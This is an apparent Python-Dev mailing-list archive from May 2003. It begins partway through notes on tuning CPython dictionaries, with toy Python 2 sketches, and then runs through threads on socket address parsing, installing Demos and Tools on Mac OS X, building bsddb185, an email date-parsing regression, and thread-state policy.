    That case is common when keyword arguments are passed.

* Maximum dictionary load in PyDict_SetItem.  Currently set to 2/3.
    Increasing this ratio makes dictionaries more dense resulting
    in more collisions.  Decreasing it improves sparseness at the
    expense of spreading entries over more cache lines and at the
    cost of total memory consumed.

    The load test occurs in highly time sensitive code.  Efforts
    to make the test more complex (for example, varying the load
    for different sizes) have degraded performance.

* Growth rate upon hitting maximum load.  Currently set to *2.
    Raising this to *4 results in half the number of resizes,
    less effort to resize, better sparseness for some (but not
    all) dict sizes, and potentially double memory consumption
    depending on the size of the dictionary.  Setting it to *4
    eliminated every other resize step (see the sketch below).
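
A tiny, illustrative model of the resize schedule only (not the real
dictobject code), comparing *2 and *4 growth under the 2/3 load rule:

    def count_resizes(n_items, growth=2, minsize=8, max_load=2.0/3.0):
        """Count resize operations while filling a table to n_items entries."""
        size = minsize
        resizes = 0
        for used in xrange(1, n_items + 1):
            if used > size * max_load:          # exceeded the load limit
                while used > size * max_load:   # grow until the limit is met
                    size *= growth
                resizes += 1
        return resizes

    for n in (1000, 100000):
        print n, count_resizes(n, growth=2), count_resizes(n, growth=4)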

Tune-ups should be measured across a broad range of applications and
use cases.  A change to any parameter will help in some situations and
hurt in others.  The key is to find settings that help the most common
cases and do the least damage to the less common cases.  Results will
vary dramatically depending on the exact number of keys, whether the
keys are all strings, whether reads or writes dominate, and the exact
hash values of the keys (some sets of values have fewer collisions than
others).  Any one test or benchmark is likely to prove misleading.


Results of Cache Locality Experiments
-------------------------------------

When an entry is retrieved from memory, 4.333 adjacent entries are also
retrieved into a cache line.  Since accessing items in cache is *much*
cheaper than a cache miss, an enticing idea is to probe the adjacent
entries as a first step in collision resolution.  Unfortunately, the
introduction of any regularity into collision searches results in more
collisions than the current random chaining approach.

Exploiting cache locality at the expense of additional collisions fails
to pay off when the entries are already loaded in cache (the expense
is paid with no compensating benefit).  This occurs in small dictionaries
where the whole dictionary fits into a pair of cache lines.  It also
occurs frequently in large dictionaries which have a common access pattern
where some keys are accessed much more frequently than others.  The
more popular entries *and* their collision chains tend to remain in cache.

To exploit cache locality, change the collision resolution section
in lookdict() and lookdict_string().  Set i^=1 at the top of the
loop and move the  i = (i << 2) + i + perturb + 1 to an unrolled
version of the loop.
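
A rough Python model of the probe order such a change would produce; the
real logic lives in lookdict() in dictobject.c, and the function below is
purely illustrative:

    PERTURB_SHIFT = 5

    def probe_order(h, mask, nprobes=8):
        """Return the first few table slots visited for hash h (rough model)."""
        i = h & mask
        perturb = h
        slots = []
        while len(slots) < nprobes:
            slots.append(i & mask)            # probe slot i
            slots.append((i ^ 1) & mask)      # then its neighbor in the same cache line
            i = (i << 2) + i + perturb + 1    # then the usual pseudo-random jump
            perturb >>= PERTURB_SHIFT
        return slots[:nprobes]

    print probe_order(123456789, mask=31)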

This optimization strategy can be leveraged in several ways:

* If the dictionary is kept sparse (through the tunable parameters),
then the occurrence of additional collisions is lessened.

* If lookdict() and lookdict_string() are specialized for small dicts
and for large dicts, then the version for large dicts can be given
the alternate search without increasing collisions in small dicts,
which already have the maximum benefit of cache locality.

* If the use case for the dictionary is known to have a random key
access pattern (as opposed to a more common pattern with a Zipf's law
distribution), then there will be more benefit for large dictionaries
because any given key is no more likely than another to already be
in cache.


Optimizing the Search of Small Dictionaries
-------------------------------------------

If lookdict() and lookdict_string() are specialized for smaller dictionaries,
then a custom search approach can be implemented that exploits the small
search space and cache locality.

* The simplest example is a linear search of contiguous entries (sketched
  below).  This is simple to implement, guaranteed to terminate rapidly,
  and precludes the need to check for dummy entries.

* A more advanced example is a self-organizing search so that the most
  frequently accessed entries get probed first.  The organization
  adapts if the access pattern changes over time.

* Also, small dictionaries may be made more dense, perhaps filling all
  eight cells to take the maximum advantage of two cache lines.
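
A toy pure-Python model of the linear-search idea mentioned above
(illustrative only; a real implementation would live in the specialized C
lookup function):

    class SmallMap:
        """Toy mapping: at most 8 entries stored contiguously, linear search."""

        def __init__(self):
            self.entries = []                 # contiguous (key, value) pairs

        def __setitem__(self, key, value):
            for i, (k, v) in enumerate(self.entries):
                if k == key:
                    self.entries[i] = (key, value)
                    return
            if len(self.entries) >= 8:
                raise OverflowError("toy model holds at most 8 entries")
            self.entries.append((key, value))

        def __getitem__(self, key):
            for k, v in self.entries:         # linear scan; no dummy entries to skip
                if k == key:
                    return v
            raise KeyError(key)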


Strategy Pattern
----------------

Consider allowing the user to set the tunable parameters or to select a
particular search method.  Since some dictionary use cases have known
sizes and access patterns, the user may be able to provide useful hints.

1) For example, if membership testing or lookup dominates runtime and memory
   is not at a premium, the user may benefit from setting the maximum load
   ratio at 5% or 10% instead of the usual 66.7%.  This will sharply
   curtail the number of collisions (see the sketch after this list).

2) Dictionary creation time can be shortened in cases where the ultimate
   size of the dictionary is known in advance.  The dictionary can be
   pre-sized so that *no* resize operations are required during creation.
   Not only does this save resizes, but the key insertion will go
   more quickly because the first half of the keys will be inserted into
   a more sparse environment than before.  The preconditions for this
   strategy arise whenever a dictionary is created from a key or item
   sequence of known length.

3) If the key space is large and the access pattern is known to be random,
   then search strategies exploiting cache locality can be fruitful.
   The preconditions for this strategy arise in simulations and
   numerical analysis.

4) If the keys are fixed and the access pattern strongly favors some of
   the keys, then the entries can be stored consecutively and accessed
   with a linear search.  This exploits knowledge of the data, cache
   locality, and a simplified search routine.  It also eliminates the
   need to test for dummy entries on each probe.  The preconditions for
   this strategy arise in symbol tables and in the builtin dictionary.
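
To give a feel for point (1) above, here is the textbook uniform-hashing
estimate of probes per successful lookup at a few load ratios (an
idealized model, not a measurement of CPython's dicts):

    import math

    def expected_probes(load):
        """Knuth's estimate for an ideal open-addressed table at the given load."""
        return (1.0 / load) * math.log(1.0 / (1.0 - load))

    for load in (0.05, 0.10, 2.0 / 3.0):
        print "load %.3f -> about %.2f probes per lookup" % (load, expected_probes(load))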



From martin@v.loewis.de  Fri May  2 07:40:21 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 02 May 2003 08:40:21 +0200
Subject: [Python-Dev] python-dev Summary for 2003-04-16 through 2003-04-30
In-Reply-To: <Pine.SOL.4.55.0305011619340.20468@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.55.0305011619340.20468@death.OCF.Berkeley.EDU>
Message-ID: <m3wuh9g8bu.fsf@mira.informatik.hu-berlin.de>

Brett Cannon <bac@OCF.Berkeley.EDU> writes:

> IDNA (International Domain Name Addressing)

Funnily, the "A" is for "in applications" (as opposed to "in the
nameserver"/"on the wire"). Explaining the acronym as
"internationalized domain names" should be sufficient.

Regards,
Martin


From Anthony Baxter <anthony@interlink.com.au>  Fri May  2 09:20:17 2003
From: Anthony Baxter <anthony@interlink.com.au> (Anthony Baxter)
Date: Fri, 02 May 2003 18:20:17 +1000
Subject: [Python-Dev] _socket efficiencies ideas
In-Reply-To: <200304091441.h39EfnU25347@odiug.zope.com>
Message-ID: <200305020820.h428KIU24126@localhost.localdomain>

>>> Guido van Rossum wrote
> Hey, I just figured it out.  The old socket module (Python 2.1 and
> before) *did* special-case \d+\.\d+\.\d+\.\d+!  This code was somehow
> lost when the IPv6 support was added.  I propose to put it back in, at
> least for IPv4 (AF_INET).  Patch anyone?

https://sourceforge.net/tracker/index.php?func=detail&aid=731209&group_id=5470&atid=305470

Unfortunately the code still goes through the idna encoding module - this
is some overhead that it would be nice to avoid for all-numeric addresses.

Anthony


From martin@v.loewis.de  Fri May  2 09:58:23 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Fri, 02 May 2003 10:58:23 +0200
Subject: [Python-Dev] _socket efficiencies ideas
In-Reply-To: <200305020820.h428KIU24126@localhost.localdomain>
References: <200305020820.h428KIU24126@localhost.localdomain>
Message-ID: <3EB2332F.70900@v.loewis.de>

Anthony Baxter wrote:
> https://sourceforge.net/tracker/index.php?func=detail&aid=731209&group_id=5470&atid=305470
> 
> Unfortunately the code still goes through the idna encoding module - this
> is some overhead that it would be nice to avoid for all-numeric addresses.

That happens only if the argument is a Unicode string, no?

Regards,
Martin



From Anthony Baxter <anthony@interlink.com.au>  Fri May  2 10:19:48 2003
From: Anthony Baxter <anthony@interlink.com.au> (Anthony Baxter)
Date: Fri, 02 May 2003 19:19:48 +1000
Subject: [Python-Dev] _socket efficiencies ideas
In-Reply-To: <3EB2332F.70900@v.loewis.de>
Message-ID: <200305020919.h429Jmp24632@localhost.localdomain>

>>> =?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?= wrote
> > Unfortunately the code still goes through the idna encoding module - this
> > is some overhead that it would be nice to avoid for all-numeric addresses.
> 
> That happens only if the argument is a Unicode string, no?

Ah. That could be the case - I think I'm loading the address from an
XML file in the test case I used... will fix that.

Anthony


From martin@v.loewis.de  Fri May  2 10:55:42 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Fri, 02 May 2003 11:55:42 +0200
Subject: [Python-Dev] _socket efficiencies ideas
In-Reply-To: <200305020919.h429Jmp24632@localhost.localdomain>
References: <200305020919.h429Jmp24632@localhost.localdomain>
Message-ID: <3EB2409E.8000403@v.loewis.de>

Anthony Baxter wrote:

> Ah. That could be the case - I think I'm loading the address from an
> XML file in the test case I used... will fix that.

If you mean "I'll fix the test case to not use XML anymore" - that
might be reasonable.

If you mean "I'll fix the test case to convert the Unicode arguments to 
byte strings before passing them to the socket module", I suggest that 
this should not be needed: the IDNA codec should complete quickly if the 
Unicode string is ASCII only (perhaps not as fast as converting the 
string to ASCII beforehand, but not significantly slower).

Regards,
Martin




From Jack.Jansen@cwi.nl  Fri May  2 13:45:34 2003
From: Jack.Jansen@cwi.nl (Jack Jansen)
Date: Fri, 2 May 2003 14:45:34 +0200
Subject: [Python-Dev] Demos and Tools in binary distributions
Message-ID: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>

There's a suggestion over on pythonmac-sig that I add the Demos and 
Tools
directories to a binary installer for MacPython for OSX. For 
MacPython-OS9
I've always included these, as the OS9 installed tree was really the 
same
layout as the source tree. But I don't really know where I should put
them for OSX.

How is this handled in binary installers for other platforms? I.e. if
you install Python on Windows, do you get Demos and Tools? Where? And
if you install an RPM or something similar on Linux?
--
Jack Jansen, <Jack.Jansen@cwi.nl>, http://www.cwi.nl/~jack
If I can't dance I don't want to be part of your revolution -- Emma 
Goldman



From thomas@xs4all.net  Fri May  2 14:02:14 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Fri, 2 May 2003 15:02:14 +0200
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>
References: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>
Message-ID: <20030502130214.GG26254@xs4all.nl>

On Fri, May 02, 2003 at 02:45:34PM +0200, Jack Jansen wrote:

> How is this handled in binary installers for other platforms? I.e. if
> you install Python on Windows, do you get Demos and Tools? Where? And
> if you install an RPM or something similar on Linux?

The Debian packages include Demo and Tools in
/usr/share/doc/python<version>/examples/; this is practically mandated by
the Debian policy ;)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido@python.org  Fri May  2 16:01:16 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 02 May 2003 11:01:16 -0400
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: "Your message of Fri, 02 May 2003 14:45:34 +0200."
 <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>
References: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>
Message-ID: <200305021501.h42F1Ga02666@pcp02138704pcs.reston01.va.comcast.net>

> There's a suggestion over on pythonmac-sig that I add the Demos and
> Tools directories to a binary installer for MacPython for OSX. For
> MacPython-OS9 I've always included these, as the OS9 installed tree
> was really the same layout as the source tree. But I don't really
> know where I should put them for OSX.
> 
> How is this handled in binary installers for other platforms? I.e. if
> you install Python on Windows, do you get Demos and Tools? Where? And
> if you install an RPM or something similar on Linux?

On Windows, you get a small selection of tools (i18n, idle, pynche,
scripts, versioncheck and webchecker) but no demos, alas.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mwh@python.net  Fri May  2 16:03:52 2003
From: mwh@python.net (Michael Hudson)
Date: Fri, 02 May 2003 16:03:52 +0100
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl> (Jack Jansen's
 message of "Fri, 2 May 2003 14:45:34 +0200")
References: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>
Message-ID: <2mof2l8k6f.fsf@starship.python.net>

Jack Jansen <Jack.Jansen@cwi.nl> writes:

> There's a suggestion over on pythonmac-sig that I add the Demos and
> Tools directories to a binary installer for MacPython for OSX. For
> MacPython-OS9 I've always included these, as the OS9 installed tree
> was really the same layout as the source tree. But I don't really
> know where I should put them for OSX.

Surely this is more a question about OSX than Python?  I.e. the
examples should go where the user expects them.
/Developer/Examples/Python?  Of course, not everyone who installs
Python will have the dev tools...

Cheers,
M.

-- 
  Need to Know is usually an interesting UK digest of things that
  happened last week or might happen next week. [...] This week,
  nothing happened, and we don't care.
                           -- NTK Now, 2000-12-29, http://www.ntk.net/


From logistix@cathoderaymission.net  Fri May  2 16:12:32 2003
From: logistix@cathoderaymission.net (logistix)
Date: Fri, 2 May 2003 10:12:32 -0500 (CDT)
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <2mof2l8k6f.fsf@starship.python.net>
Message-ID: <Pine.LNX.4.44.0305021009460.6787-100000@oblivion.cathoderaymission.net>

On Fri, 2 May 2003, Michael Hudson wrote:

> Jack Jansen <Jack.Jansen@cwi.nl> writes:
> 
> > There's a suggestion over on pythonmac-sig that I add the Demos and
> > Tools directories to a binary installer for MacPython for OSX. For
> > MacPython-OS9 I've always included these, as the OS9 installed tree
> > was really the same layout as the source tree. But I don't really
> > know where I should put them for OSX.
> 
> Surely this is more a question about OSX than Python?  I.e. the
> examples should go where the user expects them.
> /Developer/Examples/Python?  Of course, not everyone who installs
> Python will have the dev tools...
> 
> Cheers,
> M.
> 

Are there currently any make targets for 'tools' and 'demos'? Adding them 
might be a way to gently influence where they get installed when all the 
different distros build their packages. 



From skip@pobox.com  Fri May  2 16:30:53 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 2 May 2003 10:30:53 -0500
Subject: [Python-Dev] updated notes about building bsddb185 module
Message-ID: <16050.36653.443229.45811@montanaro.dyndns.org>

Folks,

A recent thread on c.l.py about the old bsddb module and new bsddb package
convinced me to add more verbiage about building the old version.  If you
have a moment, please take a look at

    http://www.python.org/2.3/highlights.html

and/or README at the top of the source tree.  (Search for "bsddb".)  I
modified them to include a brief note about building the bsddb185 module and
making it appear as the default when people "import bsddb".

Feedback appreciated.

Thanks,

Skip



From barry@python.org  Fri May  2 16:44:39 2003
From: barry@python.org (Barry Warsaw)
Date: 02 May 2003 11:44:39 -0400
Subject: [Python-Dev] updated notes about building bsddb185 module
In-Reply-To: <16050.36653.443229.45811@montanaro.dyndns.org>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
Message-ID: <1051890279.29805.0.camel@barry>

On Fri, 2003-05-02 at 11:30, Skip Montanaro wrote:
> Folks,
> 
> An recent thread on c.l.py about the old bsddb module and new bsddb package
> convinced me to add more verbiage about building the old version.  If you
> have a moment, please take a look at
> 
>     http://www.python.org/2.3/highlights.html
> 
> and/or README at the top of the source tree.  (Search for "bsddb".)  I
> modified them to include a brief note about building the bsddb185 module and
> making it appear as the default when people "import bsddb".

Without actually trying the recipe, the instructions seem reasonable.

-Barry




From dberlin@dberlin.org  Fri May  2 16:58:03 2003
From: dberlin@dberlin.org (Daniel Berlin)
Date: Fri, 2 May 2003 11:58:03 -0400
Subject: [Python-Dev] 2.3 broke email date parsing
Message-ID: <DAFEE973-7CB6-11D7-B8AB-000A95A34564@dberlin.org>

Parsing dates in emails is broken in 2.3 compared to 2.2.2.
Changing parsedate_tz back to what it was in 2.2.2 fixes it.
I'm not sure who or why this change was made, but it clearly doesn't 
handle cases it used to:
(oldparseaddr is the 2.3 version with the patch at the bottom applied, 
which reverts it to what it was in 2.2.2)

 >>> import _parseaddr
 >>> _parseaddr.parsedate_tz("3 Mar 2001 02:04:50 -0000")
 >>> import oldparseaddr
 >>> oldparseaddr.parsedate_tz("3 Mar 2001 02:04:50 -0000")
(2001, 3, 3, 2, 4, 50, 0, 0, 0, 0)
 >>>

The problem is obvious from looking at the new code:
The old version would only care if it actually found something it 
needed to delete. The new version assumes there *must* be a comma in 
the date if there is no dayname, and if there isn't, returns nothing.

I wanted to know if this was a mistake, or done on purpose.  If it's a 
mistake, i'll submit a patch to sourceforge to fix it.

Index: _parseaddr.py
===================================================================
RCS file: /cvsroot/python/python/dist/src/Lib/email/_parseaddr.py,v
retrieving revision 1.5
diff -u -3 -p -r1.5 _parseaddr.py
--- _parseaddr.py       17 Mar 2003 18:35:42 -0000      1.5
+++ _parseaddr.py       2 May 2003 15:42:30 -0000
@@ -49,14 +49,9 @@ def parsedate_tz(data):
      data = data.split()
      # The FWS after the comma after the day-of-week is optional, so 
search and
      # adjust for this.
-    if data[0].endswith(',') or data[0].lower() in _daynames:
+    if data[0][-1] in (',', '.') or data[0].lower() in _daynames:
          # There's a dayname here. Skip it
          del data[0]
-    else:
-        i = data[0].rfind(',')
-        if i < 0:
-            return None
-        data[0] = data[0][i+1:]
      if len(data) == 3: # RFC 850 date, deprecated
          stuff = data[0].split('-')
          if len(stuff) == 3:



From just@letterror.com  Fri May  2 17:20:40 2003
From: just@letterror.com (Just van Rossum)
Date: Fri,  2 May 2003 18:20:40 +0200
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <2mof2l8k6f.fsf@starship.python.net>
Message-ID: <r01050400-1025-1DA105BD7CBA11D7AACC003065D5E7E4@[10.0.0.23]>

Michael Hudson wrote:

> Surely this is more a question about OSX than Python?  I.e. the
> examples should go where the user expects them.
> /Developer/Examples/Python?  Of course, not everyone who installs
> Python will have the dev tools...

Actually, I didn't know until recently that 3rd party stuff sometimes
gets installed there (eg. the PyObjC doco). I would actually expect it
in /Application/MacPython-2.3/..., as that's where the apps get
installed. I guess /Developer/... would make sense if the Python apps
got installed in /Developer/Applications/, which they don't.

Just


From theller@python.net  Fri May  2 17:35:36 2003
From: theller@python.net (Thomas Heller)
Date: 02 May 2003 18:35:36 +0200
Subject: [Python-Dev] New thread death in test_bsddb3
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEIFEIAB.tim_one@email.msn.com>
References: <LNBBLJKPBEHFEDALKOLCMEIFEIAB.tim_one@email.msn.com>
Message-ID: <vfwtgvc7.fsf@python.net>

"Tim Peters" <tim_one@email.msn.com> writes:

> [Thomas Heller]
> > ...
> > So is the policy now that it is no longer *allowed* to create another
> > thread state, while in previous versions there wasn't any choice,
> > because there existed no way to get the existing one?
> 
> You can still create all the thread states you like; the new check is in
> PyThreadState_Swap(), not in PyThreadState_New().
So you can create them, but are not allowed to use them? (Should there
be a smiley here, or not, I'm not sure)

> 
> There was always a choice, but previously Python provided no *help* in
> keeping track of whether a thread already had a thread state associated with
> it.  That didn't stop careful apps from providing their own mechanisms to do
> so.
> 
> About policy, yes, it appears to be so now, else Mark wouldn't be raising a
> fatal error <wink>.  I view it as having always been the policy (from a
> good-faith reading of the previous code), just a policy that was too
> expensive for Python to enforce.  There are many policies like that, such as
> not passing goofy arguments to macros, and not letting references leak.
> Python doesn't currently enforce them because it's currently too expensive
> to enforce them.  Over time that can change.

I'm confused: what *is* the policy now?
And: Has the policy *changed*, or was it simply not checked before?

Since I don't know the policy, I can only guess if the fatal error is
appropriate or not.

If it is, there should be a 'recipe' what to do (even if it is 'use the
approach outlined in PEP311').

If it is not, the error should be removed (IMO).

> Clearly, I like having fatal errors for dubious things in debug builds.
> Debug builds are supposed to help you debug.  If the fatal error here drives
> you insane, and you don't want to repair the app code,

No, not at all.

Thanks,

Thomas



From martin@v.loewis.de  Fri May  2 18:01:51 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Fri, 02 May 2003 19:01:51 +0200
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185 module
In-Reply-To: <16050.36653.443229.45811@montanaro.dyndns.org>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
Message-ID: <3EB2A47F.8000706@v.loewis.de>

Skip Montanaro wrote:

> Feedback appreciated.

I think we need to build bsddb185 automatically under certain
conditions. I have encouraged a user to submit a patch in that
direction.

Regards,
Martin




From skip@pobox.com  Fri May  2 18:34:40 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 2 May 2003 12:34:40 -0500
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <3EB2A47F.8000706@v.loewis.de>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
 <3EB2A47F.8000706@v.loewis.de>
Message-ID: <16050.44080.588636.503705@montanaro.dyndns.org>

    Martin> Skip Montanaro wrote:
    >> Feedback appreciated.

    Martin> I think we need to build bsddb185 automatically under certain
    Martin> conditions. I have encouraged a user to submit a patch in that
    Martin> direction.

I suppose that's an alternative, however, it is complicated by a couple
issues:

    * The bsddb185 module would have to be built as bsddb (not a big deal in
      and of itself).

    * The current bsddb package directory would have to be renamed or not
      installed to avoid name clashes.

I don't think there's a precedent for the second issue.  The make install
target installs everything in Lib.  I think The decision about whether the
package or the module gets installed would be made in setup.py.  The
coupling between the two increases the complexity of the process.  I smell
an ugly hack in the offing.

Skip


From tim.one@comcast.net  Fri May  2 18:55:05 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 02 May 2003 13:55:05 -0400
Subject: [Python-Dev] New thread death in test_bsddb3
In-Reply-To: <vfwtgvc7.fsf@python.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKENKFIAA.tim.one@comcast.net>

[Thomas Heller]
>>> ...
>>> So is the policy now that it is no longer *allowed* to create another
>>> thread state, while in previous versions there wasn't any choice,
>>> because there existed no way to get the existing one?

[Tim]
>> You can still create all the thread states you like; the new check is
>> in PyThreadState_Swap(), not in PyThreadState_New().

[Thomas]
> So you can create them,

Yes.

> but are not allowed to use them?

Currently, no more than one at a time per thread.  The API doesn't appear to
preclude using multiple thread states with a single thread if the right
dances are performed.  Offhand I don't know why someone would want to, but
people want to do a lot of silly things <wink>.

> (Should there be a smiley here, or not, I'm not sure)

No.

> ...
> I'm confused: what *is* the policy now?
> And: Has the policy *changed*, or was it simply not checked before?

I already gave you my best guesses about those (no, yes).

> Since I don't know the policy, I can only guess if the fatal error is
> appropriate or not.

Ditto (yes).

> If it is, there should be a 'recipe' what to do (even if it is 'use the
> approach outlined in PEP311').

Additions to NEWS and the PEP would be fine by me.

> If it is not, the error should be removed (IMO).

Sure.



From tim.one@comcast.net  Fri May  2 20:28:41 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 02 May 2003 15:28:41 -0400
Subject: [Python-Dev] Draft of dictnotes.txt  [Please Comment]
In-Reply-To: <000901c3106b$0d549d20$125ffea9@oemcomputer>
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEOEFIAA.tim.one@comcast.net>

[Raymond Hettinger]

> NOTES ON OPTIMIZING DICTIONARIES
> ================================
> ...

Very nice!  Please check it in.


From tim.one@comcast.net  Fri May  2 20:59:40 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 02 May 2003 15:59:40 -0400
Subject: [Python-Dev] python-dev Summary for 2003-04-16 through 2003-04-30
In-Reply-To: <Pine.SOL.4.55.0305011619340.20468@death.OCF.Berkeley.EDU>
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEOJFIAA.tim.one@comcast.net>

[Brett Cannon]
> ...
> But the function still got added for numbers.  So, as of Python 2.3b1,
> there is a built-in named 'sum' that has the parameter list
> "sum(list_of_numbers [, start=0]) -> sum of the numbers in
> list_of_numbers".  The 'start' parameter allows you to specify where to
> start in the list for your running sum.

list_of_numbers is really any iterable producing numbers.

All the numbers are added ("start" doesn't affect that), as if via

def sum(seq, start=0):
    result = start
    for x in seq:
        result += x
    return result

The best use for start is if you're summing a sequence of number-like
arguments that can't be added to the integer 0 (datetime.timedelta is an
example).
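
For instance, a minimal sketch:

    import datetime

    deltas = [datetime.timedelta(hours=2), datetime.timedelta(minutes=30)]
    print sum(deltas, datetime.timedelta(0))   # 2:30:00; a start of 0 would raise TypeError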

> ...
> Python, the gift that keeps on giving you more responsibility.  =)

Speaking of which, your PSF dues for April are overdue <wink>.

> ...
> `os.path.walk() lacks 'depth first' option`__
>     Someone requested that os.path.walk support depth-first walking.

This was a terminology confusion:  os.path.walk() always did depth-first
walking, and so does the new os.walk().  The missing bit was an option to
control whether directories are delivered in preorder ("top down") or
postorder ("bottom up") during the depth-first walk.

> The request was deemed not important enough to bother implementing,

A topdown flag is implemented in os.walk().
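
For example, a minimal sketch (the starting directory is arbitrary):

    import os

    # "top down" (preorder): each directory is yielded before its subdirectories
    for dirpath, dirnames, filenames in os.walk('/tmp', topdown=True):
        print dirpath

    # "bottom up" (postorder): subdirectories are yielded before their parent
    for dirpath, dirnames, filenames in os.walk('/tmp', topdown=False):
        print dirpath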



From Jack.Jansen@oratrix.com  Fri May  2 22:52:08 2003
From: Jack.Jansen@oratrix.com (Jack Jansen)
Date: Fri, 2 May 2003 23:52:08 +0200
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <r01050400-1025-1DA105BD7CBA11D7AACC003065D5E7E4@[10.0.0.23]>
Message-ID: <51F6BD90-7CE8-11D7-A7DC-000A27B19B96@oratrix.com>

On vrijdag, mei 2, 2003, at 18:20 Europe/Amsterdam, Just van Rossum 
wrote:

> Michael Hudson wrote:
>
>> Surely this is more a question about OSX than Python?  I.e. the
>> examples should go where the user expects them.
>> /Developer/Examples/Python?  Of course, not everyone who installs
>> Python will have the dev tools...
>
> Actually, I didn't know until recently that 3rd party stuff sometimes
> gets installed there (eg. the PyObjC doco). I would actually expect it
> in /Application/MacPython-2.3/..., as that's where the apps get
> installed. I guess /Developer/... would make sense if the Python apps
> got installed in /Developer/Applications/, which they don't.

I'm also tempted to go with /Applications/MacPython-2.3/Demo and 
.../Tools.
That is what a lot of Mac applications do. It has a slight problems, 
though:
it would look unintuitive to a pure-unix user. But as there isn't a
standard location for this on unix anyway: who cares <wink>.

A slightly more serious problem is that the README's in Tools and Demo 
aren't
really meant for the 100%-novice, and a prominent location at the top 
of the
/Applications/MacPython-2.3 folder will make it almost-100%-certain that
these files are going to be among the first they read.

I could put Demo and Tools one level deeper (in an Extras folder?) and
provide a readme there explaining that these demos and tools are for all
Pythons on all platforms, so may not work and/or may not be intelligible
in the first place.
--
- Jack Jansen        <Jack.Jansen@oratrix.com>        
http://www.cwi.nl/~jack -
- If I can't dance I don't want to be part of your revolution -- Emma 
Goldman -



From just@letterror.com  Fri May  2 23:08:48 2003
From: just@letterror.com (Just van Rossum)
Date: Sat,  3 May 2003 00:08:48 +0200
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <51F6BD90-7CE8-11D7-A7DC-000A27B19B96@oratrix.com>
Message-ID: <r01050400-1025-A7D6FBB87CEA11D7AF4B003065D5E7E4@[10.0.0.23]>

Jack Jansen wrote:

> I could put Demo and Tools one level deeper (in an Extras folder?)
> and provide a readme there explaining that these demos and tools are
> for all Pythons on all platforms, so may not work and/or may not be
> intellegible int he first place.

+1

Just


From martin@v.loewis.de  Sat May  3 00:39:51 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Sat, 03 May 2003 01:39:51 +0200
Subject: [Python-Dev] New thread death in test_bsddb3
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHKENKFIAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHKENKFIAA.tim.one@comcast.net>
Message-ID: <3EB301C7.5000508@v.loewis.de>

Tim Peters wrote:

> Currently, no more than one at a time per thread.  The API doesn't appear to
> preclude using multiple thread states with a single thread if the right
> dances are performed.  Offhand I don't know why someone would want to, but
> people want to do a lot of silly things <wink>.

There are many good reasons; here is one scenario:

Application A calls embedded Python. It creates thread state T1 to do 
so. Python calls library L1, which releases GIL. L1 calls L2. L2 calls
back into Python. To do so, it allocates a new thread state, and 
acquires the GIL. All in one thread.

L2 has no idea that A has already allocated a thread state for this 
thread. With the new API, L2 does not need any longer to create a thread 
state. However, in older Python releases, this was necessary, so 
libraries do such things. It is unfortunate that these libraries now 
break, and I wish the new API would not be enforced so strictly yet.

> I already gave you my best guesses about those (no, yes).

I think your guess is wrong: In the past, it was often *necessary* to 
have multiple thread states allocated for a single thread. There was 
simply no other option. So it can't be that this was not allowed.

Regards,
Martin




From skip@pobox.com  Sat May  3 00:49:31 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 2 May 2003 18:49:31 -0500
Subject: [Python-Dev] removing csv directory from nondist/sandbox - how?
Message-ID: <16051.1035.821998.148196@montanaro.dyndns.org>

Taking a cue from Raymond's sandbox/itertools cleanup, I cvs removed the
contents of sandbox/csv just now.  How do I get rid of the sandbox/csv
directory itself?  I see that the itertools directory remains as well, even
though I executed "cvs -dP ." from the sandbox directory.

Skip


From martin@v.loewis.de  Sat May  3 00:32:24 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Sat, 03 May 2003 01:32:24 +0200
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <16050.44080.588636.503705@montanaro.dyndns.org>
